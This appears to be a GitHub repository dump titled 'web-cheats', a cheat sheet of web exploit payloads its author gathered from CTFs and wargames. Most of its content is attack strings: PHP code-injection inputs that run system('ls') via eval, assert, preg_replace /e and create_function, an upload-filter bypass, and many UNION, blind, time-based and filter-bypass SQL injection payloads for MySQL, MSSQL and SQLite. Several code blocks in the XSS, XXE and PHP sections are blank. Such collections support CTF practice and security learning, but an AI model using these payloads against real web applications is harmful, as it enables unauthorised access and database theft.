├── README.md
├── codeexec.md
├── lfi.md
├── sqli.md
├── xss.md
└── xxe.md
/README.md:
--------------------------------------------------------------------------------
1 | # web-cheats
2 | This repo is a collection of exploits (cheats) of web-vulnerabilities encountered during participating in ctfs, wargames etc.
3 |
4 | * [SQL Injection](https://github.com/rnehra01/web-cheats/blob/master/sqli.md)
5 | * [Code-Injection](https://github.com/rnehra01/web-cheats/blob/master/codeexec.md)
6 | * [XSS](https://github.com/rnehra01/web-cheats/blob/master/xss.md)
7 | * [LFI](https://github.com/rnehra01/web-cheats/blob/master/lfi.md)
8 | * [XXE](https://github.com/rnehra01/web-cheats/blob/master/xxe.md)
9 |
--------------------------------------------------------------------------------
/codeexec.md:
--------------------------------------------------------------------------------
1 | ###### `#` needs to be encoded when attacks are used through urls
2 |
3 | #### Beware of the following functions :
4 | ##eval
5 |
6 | ```
7 |
11 | ```
12 |
13 | _[attack]_ = `URL?name=";syslem("ls");#`
14 |
15 | ##assert() - identical to eval()
16 | ```
17 |
21 | ```
22 | _[attack]_ = `URL?name='.system("ls");#`
23 |
24 | ##preg_replace (with /e modifier) => preg_replace('/.*/e',...) - /e does an eval() on the match
25 | ```
26 |
29 | ```
30 | _[attack]_ = `URL?pattern=/.*/e&new=system("ls")&base=something`
31 |
32 | ##create_function
33 | ```
34 | '.$order.',$b->'.$order.');'));
36 | ?>
37 | ```
38 | _[attack]_ = `?order=id);}system('ls');#`
39 |
40 | include[_once] / require[_once]
41 |
42 | WildCard : A .php file can be uploaded bypassing preg_match('/\.php$/',$file) by name the file as .php2 or .php.blah so that apche doesn't know to handle the extension move to next one and run the php code
43 |
--------------------------------------------------------------------------------
/lfi.md:
--------------------------------------------------------------------------------
1 | ### Some special paths
2 |
3 | * `/proc/self/environ` Another way to access it is using symlink (`/dev/fd` -> `/proc/self/fd`)
4 |
--------------------------------------------------------------------------------
/sqli.md:
--------------------------------------------------------------------------------
1 | ###### In the following queries, `'` may not work sometimes, so { **\`**,`"` } can be tested
2 | ###### To comment out the remaining code, { `;#`,`;--`,`;//` } can be used
3 | ###### While doing sqli through urls, { `;#`,`;--`,`;//` } need to be encoded specially
4 |
5 | ### Finding no of columns in table _(Error-based SQLI)_
6 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
7 |
8 | * _[$input_user]_ : `' UNION SELECT 1,2,3.. FROM table_name --`
9 | * _[$input_user]_ : `' ORDER BY n --` [If we get error for n, then n-1 will be no of columns]
10 |
11 | ### Limiting no of rows
12 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
13 |
14 | * _[$input_user]_ : `' OR 1=1 LIMIT 1 --`
15 |
16 | ## For Mysql
17 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
18 | ###### Assume no of columns to be 3
19 | #### Finding version and databases
20 | * _[$input_user]_ : `' UNION SELECT 1,@@version,database() --`
21 |
22 | #### Extracting Tables from databases
23 | * _[$input_user]_ : `' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()`
24 |
25 | #### Extracting columns from databases
26 | * _[$input_user]_ : `' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()`
27 | * _[$input_user]_ : `' UNION SELECT table_name, column_name, 1 FROM information_schema.columns`
28 |
29 | ### Fetching a particular column without knowing column's name
30 | * `SELECT F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F;` will fetch 4th column of `users`.
31 |
32 | It works because the column names of the table derived from the subselect are the values of the leftmost `SELECT`
33 | ## For Mssql
34 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
35 | ###### Assume no of columns to be 3
36 | #### Finding version and databases
37 | * _[$input_user]_ : `' UNION SELECT 1,@@version,db_name(i) --` [Here **i** is the i-th database present]
38 | * _[$input_user]_ : `' UNION SELECT 1,@@version,name FROM master..sysdatabases --`
39 |
40 | __[In MsSQL, if second colums is `username` then the payload `' UNION SELECT 1,1,name FROM master..sysdatabases --` won't work , second column MUST be a string. Interesting !!]__
41 |
42 | ## For sqlite
43 | In sqlite __sqlite_master__ replaces __information_schema__
44 |
45 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
46 | #### Extracting sqlite version
47 | _[$input_user]_ : `' UNION SELECT sqlite_version()`
48 | #### Extracting table names
49 | _[$input_user]_ : `' UNION SELECT name FROM sqlite_master WHERE type='table'`
50 | #### Extracting column names from a table
51 | _[$input_user]_ : `' UNION SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name = 'table_name'`
52 |
53 | ## Blind SQLI
54 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
55 |
56 | * _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "%a%") --` [It will ask whether a user with letter "a" or "A" containing in his name]
57 | * _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "__a%") --` [It will ask whether the letter is at 3rd place or NOT]
58 |
59 | HERE `%`,`_` are WILDCARDS. `%` matches any string and `_` matches only one character
60 |
61 | * By default, LIKE is __case-insensitive__
62 |
63 | _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE BINARY "%a%") --` [To make a case sensitive search, use BINARY right after LIKE]
64 |
65 | ## Time-based Blind SQLI
66 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
67 | #### MySQLI
68 | * _[$input_user]_ : `' OR (SELECT SLEEP(10) FROM table_name WHERE username='something') --`
69 | * _[$input_user]_ : `' OR IF(username='something',SLEEP(10),0) --`
70 |
71 | [Produces a delayed response if username=`something` exists]
72 | #### SQLite
73 | * _[$input_user]_ : `' OR CONDITION='true' AND 1=randomblob(100000000) --`
74 |
75 | [Produces a delayed response if CONDITION='true']
76 |
77 | ## Bypassing BLACKLISTED CHARS
78 | * `,` using `JOIN`
79 |
80 | `SELECT 1,2,3 FROM users` : `SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c`
81 |
82 | * Bypassing filtered `'`__[quote]__ (special case)
83 |
84 | ```
85 | user = `\` & pass = `OR 1=1 --`
91 |
92 | ## Common-errs
93 | * `mysql` does a case insensitive search by default and also ignores the trailing spaces
94 |
95 | How to exploit that?
96 |
97 | A username `Admin` can be created and it can be used to sign-in as `admin`
98 |
--------------------------------------------------------------------------------
/xss.md:
--------------------------------------------------------------------------------
1 | ### XSS
2 |
3 | * ``
4 | * ``
5 |
--------------------------------------------------------------------------------
/xxe.md:
--------------------------------------------------------------------------------
1 | #### XXE with SVG
2 | ```
3 |
4 |
6 | ]>
7 |
10 | ```
11 | This displays the results in rendered svg image.
12 |
--------------------------------------------------------------------------------